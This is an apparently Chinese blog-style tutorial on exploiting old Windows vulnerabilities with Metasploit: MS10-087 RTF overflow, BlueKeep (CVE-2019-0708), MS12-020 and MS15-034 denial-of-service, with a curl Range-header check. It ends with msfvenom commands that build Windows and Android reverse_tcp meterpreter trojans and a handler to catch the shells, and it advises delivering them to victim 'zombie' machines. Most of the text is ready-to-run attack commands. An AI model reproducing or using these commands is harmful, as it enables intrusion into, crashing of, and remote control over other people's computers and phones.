一.准备及介绍
1、本文介绍MS10-087、CVE-2019-0708(win7 2008r2)、ms12-020 (2003)ms15-034(iis的HTTP.sys)漏洞利用;kali木马生成使用。
2、环境:kali、win2003/2008r2、Office 2003 。
二.漏洞利用 /kali木马生成使用
1、MS10-087
1)操作系统:VMWare Windows XP SP3、Office版本:Microsoft Office 2003 SP3
2)MS10-087是微软OFFICE办公软件在处理RTF文档的绘图pFragments 属性时产生的一个栈溢出漏洞,可能允许攻击者以特制的RTF格式数据远程执行任意代码。
3)search 10-087
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
获取shell或者复制、粘贴到肉鸡;双击后:
2、CVE-2019-0708
1)影响系统:windows2003、windows2008、windows2008 R2、windows xp 、win7
2)CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。
3)search 2019_0708
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhost192.168.1.98
set target 1
run
3、ms12-020
1)Microsoft windows远程桌面协议RDP远程代码执行漏洞;
2)RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。 然后控制系统。
3)搜索模块,调用模块,设置参数,执行
执行后靶机会蓝屏,并重启
4、ms15-034
1)漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞;使用metasploit的auxiliary/dos/http/ms15_034_ulonglongadd模块可直接造成服务器蓝屏。
2)主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。
3)测试命令:
curl http://192.168.1.20 -H "Host: 192.168.1.20 " -H "Range: bytes=0-18446744073709551615";出现Requested Range Not Satisfiable时说明存在漏洞。
4)search 15-034
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts 192.168.1.120
run
修复方法:禁用IIS内核缓存(可能降低IIS性能)
5、MSF木马生成使用
1)木马生成:PC:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f exe -o payload.exe
android:(msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f apk -o app.apk)
2)生成后用其它漏洞获取shell或复制、粘贴到肉鸡/发送到肉鸡测试。
进入MSF监听:1.use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set lhost IP((kali)本机IP)
4. set lport 4444 (随便设置电脑基本不会使用端口)
5.exploit
3)肉鸡/手机上运行,kali即可监听到,并获取shell。(有shell能干啥???O(∩_∩)O哈哈~)
本文仅供学习、交流!!!
网友评论